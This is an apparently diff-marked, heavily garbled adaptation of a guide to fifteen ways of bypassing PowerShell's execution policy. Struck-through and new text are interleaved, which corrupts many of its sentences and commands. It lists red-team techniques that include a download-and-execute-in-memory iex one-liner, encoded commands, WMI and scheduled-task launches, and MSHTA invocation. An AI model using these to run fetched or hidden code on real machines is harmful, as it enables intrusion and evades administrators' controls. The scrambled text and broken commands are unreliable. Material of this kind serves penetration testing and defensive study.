Bypass the PowerShell Execution Policy

💻 15 Ways to Bypass the PowerShell Execution Policy

~~Author:~~Based on the original by Scott Sutherland (~~summarized & adapted)~~
~~Original:~~ NetSPI ~~Blog~~)

🧠 Introduction

~~PowerShell'~~PowerShell’s execution policy ~~is designed to prevent unauthorized or accidental~~restricts script ~~execution.~~execution, ~~However,~~but ~~there are many legitimate reasons to work around it — especially during penetration testing, red team exercises, or automation. Below are 15 common~~these methods allow you to bypass ~~the~~it ~~policy,~~without needing admin rights.

🧪 Quick Methods with explanations.

🔐 Bypass Techniques ExplainedExamples

1. Paste ~~Script Directly~~directly in ~~Console~~the console
~~PowerShell~~Policies ~~only~~don’t ~~applies execution policy~~apply to ~~script~~manually ~~files.~~typed ~~If you paste code directly into the console, it bypasses policy restrictions entirely.~~commands.
2.Echo ~~Pipe~~& ~~Script~~pipe to PowerShell
~~You can echo the script and pipe it to PowerShell’s standard input:~~
```
echo Write-Host "Hello"Hi" \| powershell -noprofile -
```
Executes ~~This~~via ~~avoids the need for saving the script to disk.~~stdin.
~~3. Read Script File and~~ Pipe ~~to PowerShell~~
~~This loads~~ a script ~~from disk and pipes it in:~~
```
file
Get-Content script.ps1 \| powershell -noprofile -
```
Reads ~~Execution policy is not enforced when the script is read~~line-by-line as input.
4. Download and ~~Execute~~execute in ~~Memory~~memory
~~Common in red teaming, this downloads and executes the script directly:~~
```
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('https://example.com/script.ps1'URL')"
```
No ~~This~~file ~~avoids writing anything~~written to disk.
~~5. Use the~~ -Command ~~Argument~~argument
~~Scripts passed via the `-command` flag are evaluated like pasted input:~~
```
powershell -command "Write-Host 'Bypassed!'Bypass'"
```
Executes inline commands.
~~6. Use~~ -EncodedCommand argument
~~Scripts can be~~ Base64-encoded ~~in Base64 and~~string passed directly to ~~PowerShell:~~ $command = "Write-Host 'Hello'" $bytes = [System.Text.Encoding]::Unicode.GetBytes($command) $encoded = [Convert]::ToBase64String($bytes) powershell -EncodedCommand $encoded ~~Useful for obfuscation and policy bypass.~~PowerShell.
7. Set ~~Policy via Group Policy or Registry~~
~~If you have access, change the~~ execution policy ~~via:~~in
```
session
Set-ExecutionPolicy Bypass -Scope Process
```
Only Oraffects ~~modify~~current ~~registry keys like `HKLM:\Software\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell`.~~session.
8. Use PowerShell ISE ~~(Integrated Scripting Environment)~~
~~ISE sometimes behaves differently and may allow execution:~~
```
powershell_ise.exe script.ps1
```
Sometimes bypasses policy.
~~9. Change File Extension~~
Rename ~~`.ps1`~~script to `.~~txt`~~txt
Read and ~~read~~run ~~it into memory inside another script. This~~manually; avoids ~~detection and~~.ps1 enforcement.
~~10. Use~~ WMI ~~to Launch Script~~execution
Runs PowerShell ~~can be run~~remotely via ~~WMI methods that bypass policies:~~ Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "powershell -nop -enc ..." Win32_Process.
~~11.~~Scheduled ~~Use Task Scheduler~~task
Create ~~a scheduled~~ task ~~that~~to ~~runs~~run your ~~PowerShell~~ script. ~~The execution policy isn't enforced in the same way:~~ schtasks /create /tn bypass /tr "powershell.exe -File script.ps1" /sc once /st 00:00
~~12.~~PowerShell ~~Use WinRM or PS Remoting~~remoting
~~When executing scripts remotely, policies~~Executes on ~~the~~remote ~~target~~systems; ~~system~~local policy may not ~~apply, especially if executed as commands:~~ Invoke-Command -ScriptBlock {Write-Host "Hello"} -ComputerName target apply.
~~13.~~Inject ~~Use~~via DLL ~~Injection or Reflective PE~~(advanced)
~~Advanced method: Inject~~Loads PowerShell ~~into~~engine ~~memory~~directly ~~via~~in ~~custom DLL or PE loader. Used by tools like PowerShell Empire.~~memory.

~~14. Use Alternate Shells (e.g., MSHTA, wscript)~~
~~Launch PowerShell indirectly~~Invoke from ~~other~~MSHTA ~~interpreters:~~or

mshtawscript
Uses vbscript:Execute("CreateObject(""Wscript.Shell"").Runalternate ""powershellscript -nophosts -encto ..."":close")

trigger PowerShell.

~~15.~~Use ~~Exploit~~trusted ~~Software~~software ~~That~~to ~~Invokes PowerShell~~execute
~~Some tools like MSBuild, Excel macros,~~Hijack or ~~installer~~abuse ~~frameworks~~applications ~~may~~that ~~invoke~~run PowerShell —under ~~which~~the ~~you can hijack.~~hood.

⚠️

Note: ~~Legal Notice~~

These methods are ~~intended~~ for ~~authorized~~legitimate ~~security~~use ~~assessments,~~only ~~research,~~— such as automation, testing, and ~~automation.~~red ~~Use~~teaming ~~responsibly~~— ~~and~~where ~~within the bounds of local laws and organizational policy.~~authorized.

~~Last adapted from NetSPI:~~ ~~https://www.netspi.com/...~~